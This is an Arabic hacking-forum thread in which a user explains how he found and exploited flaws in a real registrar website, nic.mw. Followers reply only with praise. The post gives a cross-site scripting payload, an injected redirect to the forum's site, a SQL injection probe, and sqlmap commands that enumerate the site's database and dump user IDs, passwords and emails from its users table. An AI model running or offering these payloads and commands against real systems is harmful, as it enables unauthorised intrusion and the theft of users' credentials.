1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : خأإآلد | المشاهدات : 886 | الردود : 19
  1. خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اليوم اعود لكم بشرح اكتشاف ثغرات الموزع وكيف يتم استغلالها بشكل مفصل لكي تتم

    الفايده من الموضوع بصراحه صاحب الفكره المبدع برستيج جزاه الله خير الجزاء

    حبيت اوضح الفكره في الشبكه لتعم الفائده بشكل اكثر

    معنا هذا الموزع تحت المجهر

    http://www.nic.mw/

    قلت خلني اتفحصه واشوف شنو فيه والحمدالله اكتشفت فيه ثغرتين

    sql & xss

    طيب نضع لمسات مصوره *:"

    [​IMG]

    نشوف الأن كيف تم اكتشاف الثغره xss

    نشوف محرك البحث

    ونجرب هذا الكود

    كود PHP:
    <<SCRIPT>alert("hacked by IQ-TeaM ");//<</SCRIPT>
    [​IMG]

    النتيجه ُ;)ًٌُ

    [​IMG]

    طلع فيه اصابه الحين نشوف نزرع كود التحويل

    نجرب الكود

    كود PHP:
    '<script>location.replace("http://www.iq-team.org");</script>'
    [​IMG]

    نشوف المسار والتحويل

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=%27%3Cscript%3Elocation.replace%28%22http%3A%2F%2Fwww.iq-team.org%22%29%3B%3C%2Fscript%3E%27&Submit=Search
    النتيجه

    [​IMG]

    تمام تم التحويل

    نتقل الان الى الثغره الثانيه الي هي sql

    نشوف كيف تم اكنتشافها

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=1'%20AND%201=3%20'
    [​IMG]

    احتمال اصابته بنوع بلند سكويل قلنا خلنا نشوف sqlmap

    نشوف الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" --dbs
    وكانت النتيجه زي ما توقعت انه مصاب

    نشوف الناتج

    [​IMG]

    نكمل الحين باقي الاوامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus --tables
    [​IMG]

    اوكي تمام نشوف الحين جدول users

    نستخدم هذا الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users --columns
    النتيجة

    [​IMG]

    نستخرج الحين البينات النهائيه

    نستخدم الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users -C user_id,password,email --dump
    ونشوف النتيجه

    [​IMG]

    تم استخراج البينات من القاعده

    والسلام خير الختام والسلام علكيم ورحمة الله وبركاته
     
    1 person likes this.
  2. Tej HAcKEr DeveloPer Plus

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    الوظيفة:
    hacker
    الإقامة:
    Tunisia
    نظام التشغيل:
    Unix
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    صراحا انتا مبدع وموضوعك رائع جدأأ شكرأأ لمجهودك راقي والمميز
     
  3. Yousef <link href="http://www.iq-team.org/vb/ghost/ghost. DeveloPer Plus

    الأنتساب:
    ‏1 نوفمبر 2012
    المشاركات:
    118
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام

    يعطيك الف عافية يا غالى

    بتوفيق يا غالى ً#ٌ5oًًًُ.
     
  4. خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    تسلموا شباب على المرور الرائع
     
  5. KaBriMO Developer

    الأنتساب:
    ‏14 يوليو 2012
    المشاركات:
    39
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    المغرب
    نظام التشغيل:
    Linux
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    [font="ae_almothnna"]مشكوور على الشرح ..![/font]
     
  6. Hell_Hac Developer

    الأنتساب:
    ‏16 يونيو 2013
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    آلمـدينـة آلمنـورة
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جميل جدا مشاء الله عليك اخي الكريم

    بارك الله فيك
     
  7. صــــاروخ Developer

    الأنتساب:
    ‏3 ديسمبر 2012
    المشاركات:
    31
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    شرح أكثر من رائع و موضوع منسق بشكل أروع

    مشكور حبيبي الغالي

    يوشم بالخماسي + التقييم لشخصك الكريم

    تحياتي حبيبي
     
  8. •● ṔriNḉẻ ●• DeveloPer Plus

    الأنتساب:
    ‏5 يناير 2013
    المشاركات:
    100
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    الإقامة:
    Hollywood
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Java
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام ورحمة الله و بركاته

    بارك الله فيك أخي شرح رائع

    واصل ابداعك ولا تحرمنا من جديدك يالغالي​
     
  9. Al-JoKeR مساعد مشرف

    الأنتساب:
    ‏22 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    الوظيفة:
    طالب علم
    الإقامة:
    الجنة ان شاء الله
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جزاك الله كل خير أخي
    إبداع وتألق دائمين​
     
  10. TIGERs HAKER Active DeveloPer

    الأنتساب:
    ‏2 نوفمبر 2012
    المشاركات:
    88
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    Unix
    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    بسمَ آللهِ مـآ شآءِ آللهُِ ،،
    شرٍح مبسطُ وبطرٍيقهِ روٍوٍعهِ ..
    آللهِ يعطُيكَ آلعآفيهُِ .. {ً#ٌ5oًًًُ. }
     

مشاركة هذه الصفحة